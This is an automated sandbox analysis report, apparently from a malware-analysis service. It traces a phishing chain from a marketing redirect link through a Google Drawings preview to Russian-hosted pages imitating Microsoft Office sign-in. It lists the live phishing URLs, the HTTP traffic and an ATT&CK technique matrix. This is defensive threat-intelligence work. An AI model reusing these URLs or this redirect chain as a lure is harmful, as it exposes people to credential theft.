Source: global trafficHTTP traffic detected: GET /evkUpQeWjmUMAENOBwgNyesdolyYbjYBUfCMNKJEWIIGMENMXFFGRKPUKTIRPTWK HTTP/1.1Host: gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://dva.dgkifyron.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://dva.dgkifyron.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /evkUpQeWjmUMAENOBwgNyesdolyYbjYBUfCMNKJEWIIGMENMXFFGRKPUKTIRPTWK HTTP/1.1Host: gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /meversion?partner=office&market=en-us&uhf=1 HTTP/1.1Host: mem.gfx.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.office.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /meversion?partner=office&market=en-us&uhf=1 HTTP/1.1Host: mem.gfx.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.office.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.office.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1 HTTP/1.1Host: recp.mkt81.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1 HTTP/1.1Host: docs.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: recp.mkt81.net
Source: global trafficDNS traffic detected: DNS query: docs.google.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: lh7-rt.googleusercontent.com
Source: global trafficDNS traffic detected: DNS query: dva.dgkifyron.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: portal.office.com
Source: global trafficDNS traffic detected: DNS query: outlook.office.com
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: substrate.office.com
Source: global trafficDNS traffic detected: DNS query: mem.gfx.ms
Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
Source: global trafficDNS traffic detected: DNS query: m365cdn.nel.measure.office.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/125857172:1734480993:OfdE6imy-GzCLV7tV1vzGVc07L0hYO19BOItnccvC5w/8f3b461238074211/ExOb.daxNHAiJT.h1RRGTEKuoCP8liHdCaZ3eIW.bag-1734484232-1.1.1.1-qNIWgYzRApq.Sk3W21WkBZVcC7C5o16q8dSHr6PvGPvTVg8.BgAUf19yvKbZUdM5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3194sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: ExOb.daxNHAiJT.h1RRGTEKuoCP8liHdCaZ3eIW.bag-1734484232-1.1.1.1-qNIWgYzRApq.Sk3W21WkBZVcC7C5o16q8dSHr6PvGPvTVg8.BgAUf19yvKbZUdM5sec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/i61ws/0x4AAAAAAA0qv3MB2HiD-Mp6/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 01:10:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Age: 2424Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=98Y9vMEODaOr0vyIkJLQCSB%2F%2Fc4eQE%2BgeiJuNcrNJXdrZeHD%2FSGiWJR4bhp72jqXe9EDeOJGNED1VzeSsnvvyPU5LqC9%2F%2FLKxqb8D7hQN4I7Sya2Gc1ycrL9iPVe5A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1391&min_rtt=1318&rtt_var=428&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2263&delivery_rate=3017910&cwnd=252&unsent_bytes=0&cid=80c5811594f56ed3&ts=21&x=0"CF-Cache-Status: HITServer: cloudflareCF-RAY: 8f3b4622ff43c47c-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1525&min_rtt=1513&rtt_var=591&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1894&delivery_rate=1814791&cwnd=210&unsent_bytes=0&cid=99bb1f43fb202770&ts=9304&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 01:10:38 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: E8QRDDf2MIg8brg5KDfI4eX8Dckdk1K9xPY=$OiJKiJaaRAQq/VFBServer: cloudflareCF-RAY: 8f3b463adf15438e-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 01:10:44 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: Hjwb+hXd0xfl+7Acb3MfJflagRW8E9bT0iU=$NkQlfOA1iZX0u8doServer: cloudflareCF-RAY: 8f3b46619d1eef9d-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 01:10:50 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: Aowl2kysZZ5ZTqU8O22RSeYyJcqj8e/sN4w=$YIUNDc9HALszeEaocache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f3b46852bd14368-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_164.1.dr, chromecache_175.1.drString found in binary or memory: http://csi.gstatic.com/csi
Source: chromecache_152.1.drString found in binary or memory: http://github.com/requirejs/almond/LICENSE
Source: chromecache_164.1.dr, chromecache_175.1.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
Source: chromecache_164.1.dr, chromecache_175.1.drString found in binary or memory: https://csi.gstatic.com/csi
Source: chromecache_164.1.dr, chromecache_175.1.drString found in binary or memory: https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: classification engineClassification label: mal60.win@22/136@52/14
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1972,i,10070688419523439903,9066158452006495313,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1972,i,10070688419523439903,9066158452006495313,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=10%Avira URL Cloudsafe
http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1100%SlashNextCredential Stealing type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://dva.dgkifyron.ru/ncn6/100%Avira URL Cloudphishing
https://dva.dgkifyron.ru/favicon.ico100%Avira URL Cloudmalware
https://gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru/evkUpQeWjmUMAENOBwgNyesdolyYbjYBUfCMNKJEWIIGMENMXFFGRKPUKTIRPTWK100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
docs.google.com
172.217.19.238
truefalse
    high
    ooc-g2.tm-4.office.com
    40.99.70.210
    truefalse
      high
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        recipsdm-campaign-pod8-960921543.ca-central-1.elb.amazonaws.com
        15.157.143.48
        truefalse
          unknown
          code.jquery.com
          151.101.2.137
          truefalse
            high
            challenges.cloudflare.com
            104.18.94.41
            truefalse
              high
              www.google.com
              142.250.181.132
              truefalse
                high
                s-part-0035.t-0009.t-msedge.net
                13.107.246.63
                truefalse
                  high
                  dva.dgkifyron.ru
                  172.67.214.93
                  truetrue
                    unknown
                    googlehosted.l.googleusercontent.com
                    142.250.181.65
                    truefalse
                      high
                      gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru
                      104.21.32.1
                      truefalse
                        high
                        js.monitor.azure.com
                        unknown
                        unknownfalse
                          high
                          www.office.com
                          unknown
                          unknownfalse
                            high
                            recp.mkt81.net
                            unknown
                            unknownfalse
                              unknown
                              outlook.office.com
                              unknown
                              unknownfalse
                                high
                                substrate.office.com
                                unknown
                                unknownfalse
                                  high
                                  m365cdn.nel.measure.office.net
                                  unknown
                                  unknownfalse
                                    high
                                    mem.gfx.ms
                                    unknown
                                    unknownfalse
                                      high
                                      login.microsoftonline.com
                                      unknown
                                      unknownfalse
                                        high
                                        portal.office.com
                                        unknown
                                        unknownfalse
                                          high
                                          lh7-rt.googleusercontent.com
                                          unknown
                                          unknownfalse
                                            high
                                            NameMaliciousAntivirus DetectionReputation
                                            https://www.office.com/false
                                              high
                                              https://mem.gfx.ms/meversion?partner=office&market=en-us&uhf=1false
                                                high
                                                https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                  high
                                                  http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1true
                                                    unknown
                                                    https://lh7-rt.googleusercontent.com/drawingsz/AHiSRb2vRX9yRkhsvHGfazZ72MIvhHTEE29fzvFIJ2wLbLb48Na1ZuKYqByE7N05I4x14kPzvPGpPC-E1sHLmtMPSMYYZFjYQ1a2lQEOxRYu2NvG2foDaSN72Eozfhv4l2hEccw?key=psfCeKuvwgTVf-bOGgtgC0jYfalse
                                                      high
                                                      https://dva.dgkifyron.ru/favicon.icofalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/i61ws/0x4AAAAAAA0qv3MB2HiD-Mp6/auto/fbE/normal/auto/false
                                                        high
                                                        http://docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1false
                                                          high
                                                          https://dva.dgkifyron.ru/ncn6/true
                                                          • Avira URL Cloud: phishing
                                                          unknown
                                                          https://docs.google.com/static/drawings/client/js/750391780-preview_integrated_core_integrated.jsfalse
                                                            high
                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8f3b461238074211/1734484236191/3d49fbda9781759e22ef658622937e3dc0dc5a7ee0fc517e38e5eca96346b40f/tXmkPobUkDYfmwyfalse
                                                              high
                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f3b461238074211&lang=autofalse
                                                                high
                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                                                  high
                                                                  https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.jsfalse
                                                                    high
                                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/125857172:1734480993:OfdE6imy-GzCLV7tV1vzGVc07L0hYO19BOItnccvC5w/8f3b461238074211/ExOb.daxNHAiJT.h1RRGTEKuoCP8liHdCaZ3eIW.bag-1734484232-1.1.1.1-qNIWgYzRApq.Sk3W21WkBZVcC7C5o16q8dSHr6PvGPvTVg8.BgAUf19yvKbZUdM5false
                                                                      high
                                                                      https://docs.google.com/static/drawings/client/css/2711563905-preview_css_ltr.cssfalse
                                                                        high
                                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f3b461238074211/1734484236191/2ItuRd0ocevcQB0false
